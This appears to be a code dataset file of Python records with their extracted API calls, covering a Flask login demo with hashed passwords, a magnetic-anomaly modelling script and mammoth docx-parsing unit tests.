(['self.ret', '(cx_1, cy_1)', '(2)', '(150, 155, 255)'], {}), '(self.ret, (cx_1, cy_1), 2, (150, 155, 255))\n', (1527, 1571), False, 'import cv2\n'), ((1587, 1641), 'cv2.circle', 'cv2.circle', (['self.ret', '(cx_2, cy_2)', '(2)', '(150, 155, 255)'], {}), '(self.ret, (cx_2, cy_2), 2, (150, 155, 255))\n', (1597, 1641), False, 'import cv2\n'), ((1657, 1707), 'cv2.circle', 'cv2.circle', (['self.ret', 'midpoint', '(2)', '(150, 255, 255)'], {}), '(self.ret, midpoint, 2, (150, 255, 255))\n', (1667, 1707), False, 'import cv2\n'), ((1936, 1986), 'cv2.resize', 'cv2.resize', (['ct.mask', '(500, 500)', 'cv2.INTER_NEAREST'], {}), '(ct.mask, (500, 500), cv2.INTER_NEAREST)\n', (1946, 1986), False, 'import cv2\n'), ((2102, 2116), 'cv2.waitKey', 'cv2.waitKey', (['(0)'], {}), '(0)\n', (2113, 2116), False, 'import cv2\n'), ((2142, 2165), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (2163, 2165), False, 'import cv2\n'), ((818, 839), 'cv2.boundingRect', 'cv2.boundingRect', (['cnt'], {}), '(cnt)\n', (834, 839), False, 'import cv2\n'), ((1842, 1881), 'cv2.cvtColor', 'cv2.cvtColor', (['ct.img', 'cv2.COLOR_HLS2BGR'], {}), '(ct.img, cv2.COLOR_HLS2BGR)\n', (1854, 1881), False, 'import cv2\n'), ((2023, 2062), 'cv2.cvtColor', 'cv2.cvtColor', (['ct.ret', 'cv2.COLOR_HLS2BGR'], {}), '(ct.ret, cv2.COLOR_HLS2BGR)\n', (2035, 2062), False, 'import cv2\n'), ((898, 961), 'cv2.rectangle', 'cv2.rectangle', (['self.ret', '(x, y)', '(x + w, y + h)', '(0, 255, 0)', '(2)'], {}), '(self.ret, (x, y), (x + w, y + h), (0, 255, 0), 2)\n', (911, 961), False, 'import cv2\n'), ((863, 883), 'cv2.contourArea', 'cv2.contourArea', (['cnt'], {}), '(cnt)\n', (878, 883), False, 'import cv2\n')] |
from flask import Flask
from flask import request
from flask import render_template
# Login Extension
from flask_login import LoginManager
from flask_login import login_required
from flask_login import login_user
from flask_login import logout_user
from mockdbhelper import MockDBHelper as DBHelper
from user import User
from flask import redirect
from flask import url_for
# Password Helper imports
from passwordhelper import PasswordHelper
# Database access layer (mock implementation).
DB = DBHelper()
# Helper for salting, hashing and validating passwords.
PH = PasswordHelper()
# Create the Flask application instance.
app = Flask(__name__)
# Secret key used to sign session cookies; '<KEY>' is a placeholder --
# replace it with a real random secret in production.
app.secret_key = '<KEY>'
# Flask-Login manager bound to the app (uses the load_user callback below).
login_manager = LoginManager(app)
@app.route("/")
def home():
    """Render the landing page."""
    template_name = "home.html"
    return render_template(template_name)
@app.route("/account")
@login_required
def account():
    """Protected page; only reachable with an authenticated session."""
    message = "You're logged in"
    return message
@login_manager.user_loader
def load_user(user_id):
    """Flask-Login callback: rebuild the User object for a stored id.

    Returns None implicitly when the id is unknown, which tells
    Flask-Login the session is invalid.
    """
    if DB.get_user(user_id):
        return User(user_id)
@app.route("/login", methods=["POST"])
def login():
    """Authenticate posted credentials and start a session on success.

    On success redirects to the account page; on failure re-renders the
    home page. (Removed a block of dead, commented-out plain-text password
    comparison code that predates the salted-hash scheme.)
    """
    email = request.form.get("email")
    password = request.form.get("password")
    stored_user = DB.get_user(email)
    # Validate against the stored salted hash, never a plain-text password.
    if stored_user and PH.validate_password(password, stored_user['salt'], stored_user['hashed']):
        user = User(email)
        login_user(user, remember=True)
        return redirect(url_for('account'))
    return home()
# Register a new user account.
@app.route("/register", methods=["POST"])
def register():
    """Create a new user when the passwords match and the email is unused.

    Always redirects back to the home page, whether registration succeeded
    or was rejected.
    """
    email = request.form.get("email")
    password = request.form.get("password")
    confirmpass = request.form.get("password2")
    # Reject mismatched passwords (idiomatic `!=` instead of `not ... ==`).
    if password != confirmpass:
        return redirect(url_for('home'))
    # Reject duplicate registrations.
    if DB.get_user(email):
        return redirect(url_for('home'))
    # Store only a salted hash of the password, never the plain text.
    salt = PH.get_salt()
    hashed = PH.get_hash(password + salt)
    DB.add_user(email, salt, hashed)
    return redirect(url_for('home'))
@app.route("/logout")
def logout():
    """End the current session and send the visitor back home."""
    logout_user()
    home_url = url_for("home")
    return redirect(home_url)
# Start the Flask development server when executed directly.
if __name__ == '__main__':
    app.run(port=5000, debug=True)
| [
"flask.render_template",
"flask_login.LoginManager",
"flask.Flask",
"flask_login.login_user",
"flask_login.logout_user",
"mockdbhelper.MockDBHelper",
"flask.request.form.get",
"passwordhelper.PasswordHelper",
"flask.url_for",
"user.User"
] | [((474, 484), 'mockdbhelper.MockDBHelper', 'DBHelper', ([], {}), '()\n', (482, 484), True, 'from mockdbhelper import MockDBHelper as DBHelper\n'), ((518, 534), 'passwordhelper.PasswordHelper', 'PasswordHelper', ([], {}), '()\n', (532, 534), False, 'from passwordhelper import PasswordHelper\n'), ((576, 591), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (581, 591), False, 'from flask import Flask\n'), ((674, 691), 'flask_login.LoginManager', 'LoginManager', (['app'], {}), '(app)\n', (686, 691), False, 'from flask_login import LoginManager\n'), ((733, 761), 'flask.render_template', 'render_template', (['"""home.html"""'], {}), "('home.html')\n", (748, 761), False, 'from flask import render_template\n'), ((1056, 1081), 'flask.request.form.get', 'request.form.get', (['"""email"""'], {}), "('email')\n", (1072, 1081), False, 'from flask import request\n'), ((1097, 1125), 'flask.request.form.get', 'request.form.get', (['"""password"""'], {}), "('password')\n", (1113, 1125), False, 'from flask import request\n'), ((1707, 1732), 'flask.request.form.get', 'request.form.get', (['"""email"""'], {}), "('email')\n", (1723, 1732), False, 'from flask import request\n'), ((1748, 1776), 'flask.request.form.get', 'request.form.get', (['"""password"""'], {}), "('password')\n", (1764, 1776), False, 'from flask import request\n'), ((1795, 1824), 'flask.request.form.get', 'request.form.get', (['"""password2"""'], {}), "('password2')\n", (1811, 1824), False, 'from flask import request\n'), ((2153, 2166), 'flask_login.logout_user', 'logout_user', ([], {}), '()\n', (2164, 2166), False, 'from flask_login import logout_user\n'), ((977, 990), 'user.User', 'User', (['user_id'], {}), '(user_id)\n', (981, 990), False, 'from user import User\n'), ((1277, 1288), 'user.User', 'User', (['email'], {}), '(email)\n', (1281, 1288), False, 'from user import User\n'), ((1297, 1328), 'flask_login.login_user', 'login_user', (['user'], {'remember': '(True)'}), '(user, remember=True)\n', 
(1307, 1328), False, 'from flask_login import login_user\n'), ((2095, 2110), 'flask.url_for', 'url_for', (['"""home"""'], {}), "('home')\n", (2102, 2110), False, 'from flask import url_for\n'), ((2187, 2202), 'flask.url_for', 'url_for', (['"""home"""'], {}), "('home')\n", (2194, 2202), False, 'from flask import url_for\n'), ((1353, 1371), 'flask.url_for', 'url_for', (['"""account"""'], {}), "('account')\n", (1360, 1371), False, 'from flask import url_for\n'), ((1885, 1900), 'flask.url_for', 'url_for', (['"""home"""'], {}), "('home')\n", (1892, 1900), False, 'from flask import url_for\n'), ((1953, 1968), 'flask.url_for', 'url_for', (['"""home"""'], {}), "('home')\n", (1960, 1968), False, 'from flask import url_for\n')] |
import sys
# local import: the mag2dpoly package lives one directory up
sys.path.append("../")
import mag2dpoly as mag
import numpy as np

# induced magnetization: modulus, inclination and declination (degrees)
Jind = mag.MagnetizVector(mod=4.9, Ideg=90.0, Ddeg=45.0)
# remanent magnetization
Jrem = mag.MagnetizVector(mod=3.1, Ideg=45.0, Ddeg=0.0)
# angle of the profile with the North axis (degrees)
northxax = 90.0
# observation points: Nobs locations along x at constant height z = -1
Nobs = 101
xzobs = np.transpose(np.vstack((np.linspace(0.0, 100.0, Nobs), -1.0 * np.ones(Nobs))))
# vertices of the polygonal body
vertices = np.array([[35.0, 50.0],
                     [65.0, 50.0],
                     [80.0, 35.0],
                     [65.0, 20.0],
                     [35.0, 20.0],
                     [20.0, 35.0]])
# indices of vertices for each body (a single body here)
nbod = 1
# Fix: use the builtin `object` dtype -- the `np.object` alias was
# deprecated in NumPy 1.20 and removed in 1.24.
bodyindices = np.empty(shape=(nbod,), dtype=object)
# use every vertex, in order, for the single body (generalized from a
# hard-coded range(6) so the vertex list can change size)
bodyindices[0] = np.arange(vertices.shape[0])
# construct the polygonal body object
pbody = mag.MagPolyBodies2D(bodyindices, vertices)
# type of forward algorithm
forwardtype = "talwani"
# one magnetization vector per body
Jindv = np.array([Jind])
Jremv = np.array([Jrem])
# compute the total magnetic field anomaly along the profile
tmag = mag.tmagpolybodies2Dgen(xzobs, Jindv, Jremv, northxax, pbody, forwardtype)

## plot
import matplotlib.pyplot as plt
plt.figure()
plt.subplot(211)
plt.title("Magnetic anomaly")
plt.plot(xzobs[:, 0], tmag, "o-")
plt.subplot(212)
plt.title("Polygonal body")
# close the polygon for plotting by appending the first vertex at the end
x = np.append(pbody.bo[0].ver1[:, 0], pbody.bo[0].ver1[0, 0])
y = np.append(pbody.bo[0].ver1[:, 1], pbody.bo[0].ver1[0, 1])
plt.plot(x, y, "o-")
plt.show()
| [
"numpy.ones",
"mag2dpoly.tmagpolybodies2Dgen",
"mag2dpoly.MagnetizVector",
"mag2dpoly.MagPolyBodies2D",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.subplot",
"numpy.array",
"matplotlib.pyplot.figure",
"numpy.append",
"numpy.empty",
"numpy.linspace",
"matplotlib.pyplot.title",
"sys.path.appe... | [((41, 63), 'sys.path.append', 'sys.path.append', (['"""../"""'], {}), "('../')\n", (56, 63), False, 'import sys\n'), ((141, 190), 'mag2dpoly.MagnetizVector', 'mag.MagnetizVector', ([], {'mod': '(4.9)', 'Ideg': '(90.0)', 'Ddeg': '(45.0)'}), '(mod=4.9, Ideg=90.0, Ddeg=45.0)\n', (159, 190), True, 'import mag2dpoly as mag\n'), ((221, 269), 'mag2dpoly.MagnetizVector', 'mag.MagnetizVector', ([], {'mod': '(3.1)', 'Ideg': '(45.0)', 'Ddeg': '(0.0)'}), '(mod=3.1, Ideg=45.0, Ddeg=0.0)\n', (239, 269), True, 'import mag2dpoly as mag\n'), ((480, 579), 'numpy.array', 'np.array', (['[[35.0, 50.0], [65.0, 50.0], [80.0, 35.0], [65.0, 20.0], [35.0, 20.0], [\n 20.0, 35.0]]'], {}), '([[35.0, 50.0], [65.0, 50.0], [80.0, 35.0], [65.0, 20.0], [35.0, \n 20.0], [20.0, 35.0]])\n', (488, 579), True, 'import numpy as np\n'), ((746, 786), 'numpy.empty', 'np.empty', ([], {'shape': '(nbod,)', 'dtype': 'np.object'}), '(shape=(nbod,), dtype=np.object)\n', (754, 786), True, 'import numpy as np\n'), ((820, 834), 'numpy.array', 'np.array', (['inds'], {}), '(inds)\n', (828, 834), True, 'import numpy as np\n'), ((882, 924), 'mag2dpoly.MagPolyBodies2D', 'mag.MagPolyBodies2D', (['bodyindices', 'vertices'], {}), '(bodyindices, vertices)\n', (901, 924), True, 'import mag2dpoly as mag\n'), ((1078, 1094), 'numpy.array', 'np.array', (['[Jind]'], {}), '([Jind])\n', (1086, 1094), True, 'import numpy as np\n'), ((1142, 1158), 'numpy.array', 'np.array', (['[Jrem]'], {}), '([Jrem])\n', (1150, 1158), True, 'import numpy as np\n'), ((1205, 1279), 'mag2dpoly.tmagpolybodies2Dgen', 'mag.tmagpolybodies2Dgen', (['xzobs', 'Jindv', 'Jremv', 'northxax', 'pbody', 'forwardtype'], {}), '(xzobs, Jindv, Jremv, northxax, pbody, forwardtype)\n', (1228, 1279), True, 'import mag2dpoly as mag\n'), ((1318, 1330), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1328, 1330), True, 'import matplotlib.pyplot as plt\n'), ((1331, 1347), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(211)'], {}), '(211)\n', 
(1342, 1347), True, 'import matplotlib.pyplot as plt\n'), ((1348, 1377), 'matplotlib.pyplot.title', 'plt.title', (['"""Magnetic anomaly"""'], {}), "('Magnetic anomaly')\n", (1357, 1377), True, 'import matplotlib.pyplot as plt\n'), ((1378, 1411), 'matplotlib.pyplot.plot', 'plt.plot', (['xzobs[:, 0]', 'tmag', '"""o-"""'], {}), "(xzobs[:, 0], tmag, 'o-')\n", (1386, 1411), True, 'import matplotlib.pyplot as plt\n'), ((1409, 1425), 'matplotlib.pyplot.subplot', 'plt.subplot', (['(212)'], {}), '(212)\n', (1420, 1425), True, 'import matplotlib.pyplot as plt\n'), ((1426, 1453), 'matplotlib.pyplot.title', 'plt.title', (['"""Polygonal body"""'], {}), "('Polygonal body')\n", (1435, 1453), True, 'import matplotlib.pyplot as plt\n'), ((1458, 1515), 'numpy.append', 'np.append', (['pbody.bo[0].ver1[:, 0]', 'pbody.bo[0].ver1[0, 0]'], {}), '(pbody.bo[0].ver1[:, 0], pbody.bo[0].ver1[0, 0])\n', (1467, 1515), True, 'import numpy as np\n'), ((1517, 1574), 'numpy.append', 'np.append', (['pbody.bo[0].ver1[:, 1]', 'pbody.bo[0].ver1[0, 1]'], {}), '(pbody.bo[0].ver1[:, 1], pbody.bo[0].ver1[0, 1])\n', (1526, 1574), True, 'import numpy as np\n'), ((1572, 1592), 'matplotlib.pyplot.plot', 'plt.plot', (['x', 'y', '"""o-"""'], {}), "(x, y, 'o-')\n", (1580, 1592), True, 'import matplotlib.pyplot as plt\n'), ((1591, 1601), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1599, 1601), True, 'import matplotlib.pyplot as plt\n'), ((382, 411), 'numpy.linspace', 'np.linspace', (['(0.0)', '(100.0)', 'Nobs'], {}), '(0.0, 100.0, Nobs)\n', (393, 411), True, 'import numpy as np\n'), ((416, 429), 'numpy.ones', 'np.ones', (['Nobs'], {}), '(Nobs)\n', (423, 429), True, 'import numpy as np\n')] |
import io
from nose.tools import istest, assert_equal
import funk
from mammoth import documents, results
from mammoth.docx.xmlparser import element as xml_element, text as xml_text
from mammoth.docx.document_xml import read_document_xml_element
from mammoth.docx.numbering_xml import Numbering
from mammoth.docx.relationships_xml import Relationships, Relationship
@istest
class ReadXmlElementTests(object):
    """Tests for reading docx document XML elements into mammoth's
    document model (text, paragraphs, runs, styles, numbering,
    hyperlinks, images, and unrecognised elements)."""

    @istest
    def text_from_text_element_is_read(self):
        element = _text_element("Hello!")
        assert_equal(documents.Text("Hello!"), _read_and_get_document_xml_element(element))

    @istest
    def can_read_text_within_run(self):
        element = _run_element_with_text("Hello!")
        assert_equal(
            documents.run([documents.Text("Hello!")]),
            _read_and_get_document_xml_element(element)
        )

    @istest
    def can_read_text_within_paragraph(self):
        element = _paragraph_element_with_text("Hello!")
        assert_equal(
            documents.paragraph([documents.run([documents.Text("Hello!")])]),
            _read_and_get_document_xml_element(element)
        )

    @istest
    def can_read_text_within_document(self):
        element = _document_element_with_text("Hello!")
        assert_equal(
            documents.Document([documents.paragraph([documents.run([documents.Text("Hello!")])])]),
            _read_and_get_document_xml_element(element)
        )

    @istest
    def paragraph_has_no_style_if_it_has_no_properties(self):
        element = xml_element("w:p")
        assert_equal(None, _read_and_get_document_xml_element(element).style_name)

    @istest
    def paragraph_has_style_name_read_from_paragraph_properties_if_present(self):
        style_xml = xml_element("w:pStyle", {"w:val": "Heading1"})
        properties_xml = xml_element("w:pPr", {}, [style_xml])
        paragraph_xml = xml_element("w:p", {}, [properties_xml])
        paragraph = _read_and_get_document_xml_element(paragraph_xml)
        assert_equal("Heading1", paragraph.style_name)

    @istest
    def paragraph_has_no_numbering_if_it_has_no_numbering_properties(self):
        element = xml_element("w:p")
        assert_equal(None, _read_and_get_document_xml_element(element).numbering)

    @istest
    def paragraph_has_numbering_properties_from_paragraph_properties_if_present(self):
        numbering_properties_xml = xml_element("w:numPr", {}, [
            xml_element("w:ilvl", {"w:val": "1"}),
            xml_element("w:numId", {"w:val": "42"}),
        ])
        properties_xml = xml_element("w:pPr", {}, [numbering_properties_xml])
        paragraph_xml = xml_element("w:p", {}, [properties_xml])
        numbering = Numbering({"42": {"1": documents.numbering_level("1", True)}})
        paragraph = _read_and_get_document_xml_element(paragraph_xml, numbering=numbering)
        assert_equal("1", paragraph.numbering.level_index)
        assert_equal(True, paragraph.numbering.is_ordered)

    @istest
    def run_has_no_style_if_it_has_no_properties(self):
        element = xml_element("w:r")
        assert_equal(None, _read_and_get_document_xml_element(element).style_name)

    @istest
    def run_has_style_name_read_from_run_properties_if_present(self):
        style_xml = xml_element("w:rStyle", {"w:val": "Emphasis"})
        run = self._read_run_with_properties([style_xml])
        assert_equal("Emphasis", run.style_name)

    @istest
    def run_is_not_bold_if_bold_element_is_not_present(self):
        run = self._read_run_with_properties([])
        assert_equal(False, run.is_bold)

    @istest
    def run_is_bold_if_bold_element_is_present(self):
        run = self._read_run_with_properties([xml_element("w:b")])
        assert_equal(True, run.is_bold)

    @istest
    def run_is_not_italic_if_italic_element_is_not_present(self):
        run = self._read_run_with_properties([])
        assert_equal(False, run.is_italic)

    @istest
    def run_is_italic_if_italic_element_is_present(self):
        run = self._read_run_with_properties([xml_element("w:i")])
        assert_equal(True, run.is_italic)

    def _read_run_with_properties(self, properties):
        # Helper: wrap the given property elements in w:rPr inside a run
        # and read the resulting document element.
        properties_xml = xml_element("w:rPr", {}, properties)
        run_xml = xml_element("w:r", {}, [properties_xml])
        return _read_and_get_document_xml_element(run_xml)

    @istest
    def can_read_tab_element(self):
        element = xml_element("w:tab")
        tab = _read_and_get_document_xml_element(element)
        assert_equal(documents.tab(), tab)

    @istest
    def children_of_w_ins_are_converted_normally(self):
        element = xml_element("w:p", {}, [
            xml_element("w:ins", {}, [
                xml_element("w:r")
            ])
        ])
        assert_equal(
            documents.paragraph([documents.run([])]),
            _read_and_get_document_xml_element(element)
        )

    @istest
    def children_of_w_smart_tag_are_converted_normally(self):
        element = xml_element("w:p", {}, [
            xml_element("w:smartTag", {}, [
                xml_element("w:r")
            ])
        ])
        assert_equal(
            documents.paragraph([documents.run([])]),
            _read_and_get_document_xml_element(element)
        )

    @istest
    def hyperlink_is_read_if_it_has_a_relationship_id(self):
        relationships = Relationships({
            "r42": Relationship(target="http://example.com")
        })
        run_element = xml_element("w:r")
        element = xml_element("w:hyperlink", {"r:id": "r42"}, [run_element])
        assert_equal(
            documents.hyperlink("http://example.com", [documents.run([])]),
            _read_and_get_document_xml_element(element, relationships=relationships)
        )

    @istest
    def hyperlink_is_ignored_if_it_does_not_have_a_relationship_id(self):
        run_element = xml_element("w:r")
        element = xml_element("w:hyperlink", {}, [run_element])
        assert_equal(
            [documents.run([])],
            _read_and_get_document_xml_element(element)
        )

    @istest
    @funk.with_context
    def can_read_inline_pictures(self, context):
        drawing_element = _create_inline_image(
            relationship_id="rId5",
            description="It's a hat",
        )
        self._assert_image_is_read(drawing_element, context)

    @istest
    @funk.with_context
    def can_read_anchored_pictures(self, context):
        drawing_element = _create_anchored_image(
            relationship_id="rId5",
            description="It's a hat",
        )
        self._assert_image_is_read(drawing_element, context)

    def _assert_image_is_read(self, drawing_element, context):
        # Shared body of the inline/anchored picture tests (previously
        # duplicated verbatim): mock the docx file and content types, read
        # the drawing, and check the resulting image.
        image_bytes = b"Not an image at all!"
        relationships = Relationships({
            "rId5": Relationship(target="media/hat.png")
        })
        docx_file = context.mock()
        funk.allows(docx_file).open("word/media/hat.png").returns(io.BytesIO(image_bytes))
        content_types = context.mock()
        funk.allows(content_types).find_content_type("word/media/hat.png").returns("image/png")
        image = _read_and_get_document_xml_element(
            drawing_element,
            content_types=content_types,
            relationships=relationships,
            docx_file=docx_file,
        )[0]
        assert_equal(documents.Image, type(image))
        assert_equal("It's a hat", image.alt_text)
        assert_equal("image/png", image.content_type)
        with image.open() as image_file:
            assert_equal(image_bytes, image_file.read())

    @istest
    def ignored_elements_are_ignored_without_message(self):
        element = xml_element("w:bookmarkStart")
        result = read_document_xml_element(element)
        assert_equal(None, result.value)
        assert_equal([], result.messages)

    @istest
    def unrecognised_elements_emit_warning(self):
        element = xml_element("w:huh", {}, [])
        result = read_document_xml_element(element)
        expected_warning = results.warning("An unrecognised element was ignored: w:huh")
        assert_equal([expected_warning], result.messages)

    @istest
    def unrecognised_elements_are_ignored(self):
        element = xml_element("w:huh", {}, [])
        assert_equal(None, read_document_xml_element(element).value)

    @istest
    def unrecognised_children_are_ignored(self):
        element = xml_element("w:r", {}, [_text_element("Hello!"), xml_element("w:huh", {}, [])])
        assert_equal(
            documents.run([documents.Text("Hello!")]),
            read_document_xml_element(element).value
        )
def _read_and_get_document_xml_element(*args, **kwargs):
    """Read the element, assert no messages were produced, and return the value."""
    read_result = read_document_xml_element(*args, **kwargs)
    assert_equal([], read_result.messages)
    return read_result.value
def _document_element_with_text(text):
    """Build a minimal w:document/w:body tree containing the given text."""
    body = xml_element("w:body", {}, [_paragraph_element_with_text(text)])
    return xml_element("w:document", {}, [body])
def _paragraph_element_with_text(text):
    """Build a w:p element whose single run contains the given text."""
    run = _run_element_with_text(text)
    return xml_element("w:p", {}, [run])
def _run_element_with_text(text):
    """Build a w:r element containing the given text."""
    text_node = _text_element(text)
    return xml_element("w:r", {}, [text_node])
def _text_element(value):
    """Build a w:t element holding the given string as its text node."""
    text_node = xml_text(value)
    return xml_element("w:t", {}, [text_node])
def _create_inline_image(description, relationship_id):
    """Build a w:drawing element whose image is inline with the text."""
    children = _create_image_elements(description, relationship_id)
    inline = xml_element("wp:inline", {}, children)
    return xml_element("w:drawing", {}, [inline])
def _create_anchored_image(description, relationship_id):
    """Build a w:drawing element whose image is anchored (floating)."""
    children = _create_image_elements(description, relationship_id)
    anchor = xml_element("wp:anchor", {}, children)
    return xml_element("w:drawing", {}, [anchor])
def _create_image_elements(description, relationship_id):
    """Common children of an image drawing: the document properties element
    plus the graphic -> graphicData -> pic -> blipFill -> blip chain that
    carries the relationship id of the embedded image."""
    blip = xml_element("a:blip", {"r:embed": relationship_id})
    blip_fill = xml_element("pic:blipFill", {}, [blip])
    picture = xml_element("pic:pic", {}, [blip_fill])
    graphic_data = xml_element("a:graphicData", {}, [picture])
    return [
        xml_element("wp:docPr", {"descr": description}),
        xml_element("a:graphic", {}, [graphic_data]),
    ]
| [
"mammoth.docx.document_xml.read_document_xml_element",
"mammoth.documents.run",
"mammoth.docx.relationships_xml.Relationship",
"mammoth.results.warning",
"funk.allows",
"io.BytesIO",
"mammoth.docx.xmlparser.text",
"mammoth.documents.numbering_level",
"mammoth.documents.Text",
"nose.tools.assert_eq... | [((9630, 9672), 'mammoth.docx.document_xml.read_document_xml_element', 'read_document_xml_element', (['*args'], {}), '(*args, **kwargs)\n', (9655, 9672), False, 'from mammoth.docx.document_xml import read_document_xml_element\n'), ((9677, 9710), 'nose.tools.assert_equal', 'assert_equal', (['[]', 'result.messages'], {}), '([], result.messages)\n', (9689, 9710), False, 'from nose.tools import istest, assert_equal\n'), ((1548, 1566), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:p"""'], {}), "('w:p')\n", (1559, 1566), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((1773, 1819), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:pStyle"""', "{'w:val': 'Heading1'}"], {}), "('w:pStyle', {'w:val': 'Heading1'})\n", (1784, 1819), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((1845, 1882), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:pPr"""', '{}', '[style_xml]'], {}), "('w:pPr', {}, [style_xml])\n", (1856, 1882), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((1907, 1947), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:p"""', '{}', '[properties_xml]'], {}), "('w:p', {}, [properties_xml])\n", (1918, 1947), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((2026, 2072), 'nose.tools.assert_equal', 'assert_equal', (['"""Heading1"""', 'paragraph.style_name'], {}), "('Heading1', paragraph.style_name)\n", (2038, 2072), False, 'from nose.tools import istest, assert_equal\n'), ((2188, 2206), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:p"""'], {}), "('w:p')\n", (2199, 2206), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((2601, 2653), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:pPr"""', '{}', '[numbering_properties_xml]'], {}), "('w:pPr', {}, [numbering_properties_xml])\n", (2612, 2653), 
True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((2678, 2718), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:p"""', '{}', '[properties_xml]'], {}), "('w:p', {}, [properties_xml])\n", (2689, 2718), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((2919, 2969), 'nose.tools.assert_equal', 'assert_equal', (['"""1"""', 'paragraph.numbering.level_index'], {}), "('1', paragraph.numbering.level_index)\n", (2931, 2969), False, 'from nose.tools import istest, assert_equal\n'), ((2978, 3028), 'nose.tools.assert_equal', 'assert_equal', (['(True)', 'paragraph.numbering.is_ordered'], {}), '(True, paragraph.numbering.is_ordered)\n', (2990, 3028), False, 'from nose.tools import istest, assert_equal\n'), ((3120, 3138), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:r"""'], {}), "('w:r')\n", (3131, 3138), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((3333, 3379), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:rStyle"""', "{'w:val': 'Emphasis'}"], {}), "('w:rStyle', {'w:val': 'Emphasis'})\n", (3344, 3379), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((3446, 3486), 'nose.tools.assert_equal', 'assert_equal', (['"""Emphasis"""', 'run.style_name'], {}), "('Emphasis', run.style_name)\n", (3458, 3486), False, 'from nose.tools import istest, assert_equal\n'), ((3627, 3659), 'nose.tools.assert_equal', 'assert_equal', (['(False)', 'run.is_bold'], {}), '(False, run.is_bold)\n', (3639, 3659), False, 'from nose.tools import istest, assert_equal\n'), ((3806, 3837), 'nose.tools.assert_equal', 'assert_equal', (['(True)', 'run.is_bold'], {}), '(True, run.is_bold)\n', (3818, 3837), False, 'from nose.tools import istest, assert_equal\n'), ((3982, 4016), 'nose.tools.assert_equal', 'assert_equal', (['(False)', 'run.is_italic'], {}), '(False, run.is_italic)\n', (3994, 4016), False, 'from nose.tools import 
istest, assert_equal\n'), ((4167, 4200), 'nose.tools.assert_equal', 'assert_equal', (['(True)', 'run.is_italic'], {}), '(True, run.is_italic)\n', (4179, 4200), False, 'from nose.tools import istest, assert_equal\n'), ((4284, 4320), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:rPr"""', '{}', 'properties'], {}), "('w:rPr', {}, properties)\n", (4295, 4320), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((4339, 4379), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:r"""', '{}', '[properties_xml]'], {}), "('w:r', {}, [properties_xml])\n", (4350, 4379), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((4507, 4527), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:tab"""'], {}), "('w:tab')\n", (4518, 4527), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((5580, 5598), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:r"""'], {}), "('w:r')\n", (5591, 5598), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((5617, 5675), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:hyperlink"""', "{'r:id': 'r42'}", '[run_element]'], {}), "('w:hyperlink', {'r:id': 'r42'}, [run_element])\n", (5628, 5675), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((5986, 6004), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:r"""'], {}), "('w:r')\n", (5997, 6004), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((6023, 6068), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:hyperlink"""', '{}', '[run_element]'], {}), "('w:hyperlink', {}, [run_element])\n", (6034, 6068), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((7152, 7194), 'nose.tools.assert_equal', 'assert_equal', (['"""It\'s a hat"""', 'image.alt_text'], {}), '("It\'s a hat", image.alt_text)\n', (7164, 
7194), False, 'from nose.tools import istest, assert_equal\n'), ((7203, 7248), 'nose.tools.assert_equal', 'assert_equal', (['"""image/png"""', 'image.content_type'], {}), "('image/png', image.content_type)\n", (7215, 7248), False, 'from nose.tools import istest, assert_equal\n'), ((8304, 8346), 'nose.tools.assert_equal', 'assert_equal', (['"""It\'s a hat"""', 'image.alt_text'], {}), '("It\'s a hat", image.alt_text)\n', (8316, 8346), False, 'from nose.tools import istest, assert_equal\n'), ((8355, 8400), 'nose.tools.assert_equal', 'assert_equal', (['"""image/png"""', 'image.content_type'], {}), "('image/png', image.content_type)\n", (8367, 8400), False, 'from nose.tools import istest, assert_equal\n'), ((8594, 8624), 'mammoth.docx.xmlparser.element', 'xml_element', (['"""w:bookmarkStart"""'], {}), "('w:bookmarkStart')\n", (8605, 8624), True, 'from mammoth.docx.xmlparser import element as xml_element, text as xml_text\n'), ((8642, 8676), 'mammoth.docx.document_xml.read_document_xml_element', 'read_document_xml_element', (['element'], {}), '(element)\n', (8667, 8676), False, 'from mammoth.docx.document_xml import read_document_xml_element\n'), ((8685, 8717), 'nose.tools.assert_equal', 'assert_equal', (['None', 'result.value'], {}), '(None, result.value)\n', (8697, 8717), False, 'from nose.tools import istest, assert_equal\n'), ((8726, 8759), 